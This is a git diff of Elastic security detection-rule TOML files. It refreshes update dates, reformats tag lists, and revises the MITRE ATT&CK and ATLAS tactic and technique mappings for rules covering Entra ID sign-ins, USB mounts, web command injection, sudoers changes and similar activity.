"2025/04/29" integration = ["azure", "o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -59,20 +59,7 @@ The Azure Fleet integration, Office 365 Logs Fleet integration, Filebeat module, risk_score = 73 rule_id = "f0cc239b-67fa-46fc-89d4-f861753a40f5" severity = "high" -tags = [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra ID Sign-in Logs", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Resources: Investigation Guide", - "Rule Type: Higher-Order Rule", -] +tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Collection", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Entra ID", "Data Source: Entra ID Sign-in Logs", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide", "Rule Type: Higher-Order Rule"] timestamp_override = "event.ingested" type = "esql" @@ -124,14 +111,36 @@ from logs-o365.audit-*, logs-azure.signinlogs-*, .alerts-security.* [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1114" +name = "Email Collection" +reference = "https://attack.mitre.org/techniques/T1114/" + +[[rule.threat.technique.subtechnique]] +id = "T1114.002" +name = "Remote Email Collection" +reference = "https://attack.mitre.org/techniques/T1114/002/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/cross-platform/initial_access_elastic_defend_alert_genai_utility_descendant.toml b/rules/cross-platform/initial_access_elastic_defend_alert_genai_utility_descendant.toml index 9bf079851a4..a3a7976428f 100644 --- a/rules/cross-platform/initial_access_elastic_defend_alert_genai_utility_descendant.toml +++ b/rules/cross-platform/initial_access_elastic_defend_alert_genai_utility_descendant.toml @@ -3,7 +3,7 @@ creation_date = "2026/02/27" maturity = "production" min_stack_comments = "ES|QL inline stats became generally available in 9.3.0 and MV_INTERSECTION is in preview since 9.3." min_stack_version = "9.3.0" -updated_date = "2026/02/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -96,18 +96,3 @@ FROM logs-endpoint.alerts-*, logs-endpoint.events.process-* metadata _id, _versi | KEEP * ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1195" -name = "Supply Chain Compromise" -reference = "https://attack.mitre.org/techniques/T1195/" -[[rule.threat.technique.subtechnique]] -id = "T1195.002" -name = "Compromise Software Supply Chain" -reference = "https://attack.mitre.org/techniques/T1195/002/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml b/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml index bfb7916cda2..4ec8cccbe6a 100644 --- a/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml +++ b/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint", "windows", "auditd_manager", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -61,19 +61,7 @@ references = [ risk_score = 73 rule_id = "ae3e9625-89ad-4fc3-a7bf-fced5e64f01b" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Data Source: Elastic Defend", - "Data Source: Auditd Manager", - "Data Source: SentinelOne", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: SentinelOne", "Data Source: Sysmon", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -118,6 +106,19 @@ and ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" diff --git a/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml b/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml index dbee870beb8..38047bc5492 100644 --- a/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml +++ b/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "Device mount events were added as part of the Elastic Defend Device Control feature." min_stack_version = "9.2.0" -updated_date = "2025/11/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -60,17 +60,7 @@ references = [ risk_score = 21 rule_id = "483832a8-ffdd-4e11-8e96-e0224f7bda9b" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "OS: macOS", - "Use Case: Threat Detection", - "Use Case: Device Control", - "Tactic: Initial Access", - "Tactic: Exfiltration", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "OS: macOS", "Use Case: Threat Detection", "Use Case: Device Control", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -81,34 +71,21 @@ host.os.type:(macos or windows) and event.type:device and event.action:mount and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1091" -name = "Replication Through Removable Media" -reference = "https://attack.mitre.org/techniques/T1091/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1052" name = "Exfiltration Over Physical Medium" reference = "https://attack.mitre.org/techniques/T1052/" + [[rule.threat.technique.subtechnique]] id = "T1052.001" name = "Exfiltration over USB" reference = "https://attack.mitre.org/techniques/T1052/001/" - - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - [rule.new_terms] field = "new_terms_fields" value = ["device.serial_number", "host.id"] diff --git a/rules/cross-platform/initial_access_fortigate_ssl_vpn_login_followed_by_siem_alert.toml b/rules/cross-platform/initial_access_fortigate_ssl_vpn_login_followed_by_siem_alert.toml index 1b1b7304706..378b3ca7c56 100644 --- a/rules/cross-platform/initial_access_fortigate_ssl_vpn_login_followed_by_siem_alert.toml +++ b/rules/cross-platform/initial_access_fortigate_ssl_vpn_login_followed_by_siem_alert.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/20" integration = ["fortinet_fortigate"] maturity = "production" -updated_date = "2026/03/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -68,13 +68,18 @@ This rule correlates a FortiGate SSL VPN login with a subsequent security alert [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" \ No newline at end of file +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/cross-platform/initial_access_ollama_api_external_access.toml b/rules/cross-platform/initial_access_ollama_api_external_access.toml index 4a059992f9c..0219cc53c21 100644 --- a/rules/cross-platform/initial_access_ollama_api_external_access.toml +++ b/rules/cross-platform/initial_access_ollama_api_external_access.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -51,19 +51,7 @@ references = [ risk_score = 47 rule_id = "d8f2a1b3-c4e5-6789-abcd-ef0123456789" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", - "Domain: LLM", - "Mitre Atlas: T0040", - "Mitre Atlas: T0044", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: AI Model Access", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Domain: LLM", "Mitre Atlas: T0040", "Mitre Atlas: T0044"] timestamp_override = "event.ingested" type = "eql" @@ -89,14 +77,26 @@ network where event.action == "connection_accepted" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATLAS" + +[[rule.threat.technique]] +id = "AML.T0040" +name = "AI Model Inference API Access" +reference = "https://atlas.mitre.org/techniques/AML.T0040/" + +[rule.threat.tactic] +id = "AML.TA0000" +name = "AI Model Access" +reference = "https://atlas.mitre.org/tactics/AML.TA0000/" diff --git a/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml b/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml index 6772035224b..ae3136dc37d 100644 --- a/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml +++ b/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2020/09/14" maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -70,16 +70,3 @@ Zoom meetings without passcodes are vulnerable to unauthorized access, known as - Coordinate with the communications team to prepare a response plan for any potential public relations issues arising from the incident, ensuring clear and consistent messaging.""" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/cross-platform/multiple_alerts_by_host_ip_and_source_ip.toml b/rules/cross-platform/multiple_alerts_by_host_ip_and_source_ip.toml index c6700035c99..6f18ddb3bfa 100644 --- a/rules/cross-platform/multiple_alerts_by_host_ip_and_source_ip.toml +++ b/rules/cross-platform/multiple_alerts_by_host_ip_and_source_ip.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2025/12/31" maturity = "production" -updated_date = "2026/02/16" +updated_date = "2026/03/23" [rule] @@ -27,7 +27,7 @@ If you are using **Elastic Defend**, ensure host IP collection is enabled by fol [helper guide](https://www.elastic.co/docs/solutions/security/configure-elastic-defend/configure-data-volume-for-elastic-endpoint#host-fields). """ severity = "high" -tags = ["Use Case: Threat Detection", "Rule Type: Higher-Order Rule", "Resources: Investigation Guide"] +tags = ["Use Case: Threat Detection", "Rule Type: Higher-Order Rule", "Tactic: Lateral Movement", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -111,3 +111,15 @@ The detection rule uses alert data to determine when multiple alerts from differ - Escalate the incident to the appropriate internal or external cybersecurity teams for further investigation and potential legal action if the attack is part of a larger campaign.""" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/cross-platform/multiple_alerts_email_elastic_defend_correlation.toml b/rules/cross-platform/multiple_alerts_email_elastic_defend_correlation.toml index 56a10ffcee4..4725b801ac1 100644 --- a/rules/cross-platform/multiple_alerts_email_elastic_defend_correlation.toml +++ b/rules/cross-platform/multiple_alerts_email_elastic_defend_correlation.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/19" integration = ["endpoint", "checkpoint_email"] maturity = "production" -updated_date = "2025/12/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -18,15 +18,7 @@ name = "Elastic Defend and Email Alerts Correlation" risk_score = 73 rule_id = "c562a800-cf97-464e-9d6f-84db91e86e10" severity = "high" -tags = [ - "Use Case: Threat Detection", - "Rule Type: Higher-Order Rule", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Check Point Harmony Email & Collaboration", - "Domain: Email", - "Domain: Endpoint" -] +tags = ["Use Case: Threat Detection", "Rule Type: Higher-Order Rule", "Tactic: Initial Access", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Check Point Harmony Email & Collaboration", "Domain: Email", "Domain: Endpoint"] timestamp_override = "event.ingested" type = "esql" @@ -82,3 +74,16 @@ This rule correlates any Elastic Defend alert with an email security related ale - Restore the host from a known good backup if necessary, ensuring that the backup is free from compromise. - Monitor the host and network for any signs of re-infection or further suspicious activity, using enhanced logging and alerting based on the identified attack patterns. - Escalate the incident to the appropriate internal or external cybersecurity teams for further investigation and potential legal action if the attack is part of a larger campaign.""" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/cross-platform/multiple_alerts_llm_compromised_user_triage.toml b/rules/cross-platform/multiple_alerts_llm_compromised_user_triage.toml index 03f1778d43d..5e2d9eb2fd5 100644 --- a/rules/cross-platform/multiple_alerts_llm_compromised_user_triage.toml +++ b/rules/cross-platform/multiple_alerts_llm_compromised_user_triage.toml @@ -3,7 +3,7 @@ creation_date = "2026/02/03" maturity = "production" min_stack_comments = "ES|QL COMPLETION command requires Elastic Managed LLM (gp-llm-v2) available in 9.3.0+" min_stack_version = "9.3.0" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -73,14 +73,7 @@ following the [LLM connector documentation](https://www.elastic.co/docs/explore- and update the `inference_id` parameter in the query to reference your configured connector. """ severity = "critical" -tags = [ - "Domain: Identity", - "Domain: LLM", - "Use Case: Threat Detection", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Rule Type: Higher-Order Rule", -] +tags = ["Domain: Identity", "Domain: LLM", "Use Case: Threat Detection", "Use Case: Identity and Access Audit", "Tactic: Initial Access", "Resources: Investigation Guide", "Rule Type: Higher-Order Rule"] timestamp_override = "event.ingested" type = "esql" @@ -159,3 +152,15 @@ from .alerts-security.* METADATA _id, _version, _index | keep user.name, user.id, user.email, host.name, message, event.reason, event.outcome, event.category, event.action, Esql.* ''' +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/cross-platform/persistence_ssh_authorized_keys_modification.toml b/rules/cross-platform/persistence_ssh_authorized_keys_modification.toml index 6d27f7fa239..61bc47503c2 100644 --- a/rules/cross-platform/persistence_ssh_authorized_keys_modification.toml +++ b/rules/cross-platform/persistence_ssh_authorized_keys_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/22" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,16 +54,7 @@ SSH authorized_keys files are crucial for secure, password-less authentication, risk_score = 47 rule_id = "2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -104,35 +95,6 @@ reference = "https://attack.mitre.org/techniques/T1098/004/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.004" -name = "SSH" -reference = "https://attack.mitre.org/techniques/T1021/004/" - -[[rule.threat.technique]] -id = "T1563" -name = "Remote Service Session Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/" - -[[rule.threat.technique.subtechnique]] -id = "T1563.001" -name = "SSH Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/001/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.executable"] diff --git a/rules/cross-platform/persistence_web_server_potential_command_injection.toml b/rules/cross-platform/persistence_web_server_potential_command_injection.toml index e71c50e44c1..144a469096a 100644 --- a/rules/cross-platform/persistence_web_server_potential_command_injection.toml +++ b/rules/cross-platform/persistence_web_server_potential_command_injection.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/19" integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -52,21 +52,7 @@ This rule flags web requests whose URLs embed command-execution payloads—inter risk_score = 21 rule_id = "f3ac6734-7e52-4a0d-90b7-6847bf4308f2" severity = "low" -tags = [ - "Domain: Web", - "Use Case: Threat Detection", - "Tactic: Reconnaissance", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Credential Access", - "Tactic: Command and Control", - "Data Source: Nginx", - "Data Source: Apache", - "Data Source: Apache Tomcat", - "Data Source: IIS", - "Data Source: Traefik", - "Resources: Investigation Guide", -] +tags = ["Domain: Web", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Nginx", "Data Source: Apache", "Data Source: Apache Tomcat", "Data Source: IIS", "Data Source: Traefik", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -157,34 +143,11 @@ from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, log [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - [rule.threat.tactic] id = "TA0002" name = "Execution" @@ -194,34 +157,11 @@ reference = "https://attack.mitre.org/tactics/TA0002/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1595" -name = "Active Scanning" -reference = "https://attack.mitre.org/techniques/T1595/" - -[[rule.threat.technique.subtechnique]] -id = "T1595.002" -name = "Vulnerability Scanning" -reference = "https://attack.mitre.org/techniques/T1595/002/" - -[[rule.threat.technique.subtechnique]] -id = "T1595.003" -name = "Wordlist Scanning" -reference = "https://attack.mitre.org/techniques/T1595/003/" +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" [rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml b/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml index 1aa962b8f7f..ed89b2cff74 100644 --- a/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml +++ b/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -19,15 +19,7 @@ references = ["https://www.elastic.co/security-labs/primer-on-persistence-mechan risk_score = 73 rule_id = "76152ca1-71d0-4003-9e37-0983e12832da" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -72,19 +64,36 @@ The sudoers file is crucial in Unix-like systems, defining user permissions for [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.003" name = "Sudo and Sudo Caching" reference = "https://attack.mitre.org/techniques/T1548/003/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml b/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml index 0c3fbef2c2e..86ff78db35a 100644 --- a/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml +++ b/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/23" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -57,15 +57,7 @@ references = ["https://www.elastic.co/security-labs/primer-on-persistence-mechan risk_score = 21 rule_id = "8a1b0278-0f9a-487d-96bd-d4833298e87a" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -100,14 +92,24 @@ name = "Setuid and Setgid" reference = "https://attack.mitre.org/techniques/T1548/001/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/cross-platform/privilege_escalation_trap_execution.toml b/rules/cross-platform/privilege_escalation_trap_execution.toml index d94587dd5b0..2d7f9b35b02 100644 --- a/rules/cross-platform/privilege_escalation_trap_execution.toml +++ b/rules/cross-platform/privilege_escalation_trap_execution.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/24" integration = ["endpoint", "auditd_manager"] maturity = "production" -updated_date = "2026/01/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -49,17 +49,7 @@ This rule flags use of the shell built-in trap to bind commands to POSIX signals risk_score = 21 rule_id = "cf6995ec-32a9-4b2d-9340-f8e61acf3f4e" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Auditd Manager", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -81,6 +71,6 @@ name = "Trap" reference = "https://attack.mitre.org/techniques/T1546/005/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/cross-platform/reconnaissance_web_server_discovery_or_fuzzing_activity.toml b/rules/cross-platform/reconnaissance_web_server_discovery_or_fuzzing_activity.toml index a21ef09d5a0..6f708721b17 100644 --- a/rules/cross-platform/reconnaissance_web_server_discovery_or_fuzzing_activity.toml +++ b/rules/cross-platform/reconnaissance_web_server_discovery_or_fuzzing_activity.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/19" integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -105,11 +105,6 @@ id = "T1595" name = "Active Scanning" reference = "https://attack.mitre.org/techniques/T1595/" -[[rule.threat.technique.subtechnique]] -id = "T1595.002" -name = "Vulnerability Scanning" -reference = "https://attack.mitre.org/techniques/T1595/002/" - [[rule.threat.technique.subtechnique]] id = "T1595.003" name = "Wordlist Scanning" diff --git a/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_logs.toml b/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_logs.toml index 6e1a850949f..a0d76d21725 100644 --- a/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_logs.toml +++ b/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_logs.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/19" integration = ["nginx", "apache", "apache_tomcat", "iis"] maturity = "production" -updated_date = "2025/12/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -99,11 +99,6 @@ id = "T1595.002" name = "Vulnerability Scanning" reference = "https://attack.mitre.org/techniques/T1595/002/" -[[rule.threat.technique.subtechnique]] -id = "T1595.003" -name = "Wordlist Scanning" -reference = "https://attack.mitre.org/techniques/T1595/003/" - [rule.threat.tactic] id = "TA0043" name = "Reconnaissance" diff --git a/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_response_codes.toml b/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_response_codes.toml index 474e146dc74..0f3c8e22610 100644 --- a/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_response_codes.toml +++ b/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_response_codes.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/19" integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -117,11 +117,6 @@ id = "T1595.002" name = "Vulnerability Scanning" reference = "https://attack.mitre.org/techniques/T1595/002/" -[[rule.threat.technique.subtechnique]] -id = "T1595.003" -name = "Wordlist Scanning" -reference = "https://attack.mitre.org/techniques/T1595/003/" - [rule.threat.tactic] id = "TA0043" name = "Reconnaissance" diff --git a/rules/cross-platform/reconnaissance_web_server_unusual_user_agents.toml b/rules/cross-platform/reconnaissance_web_server_unusual_user_agents.toml index f98e838dc84..e2c8e39c56d 100644 --- 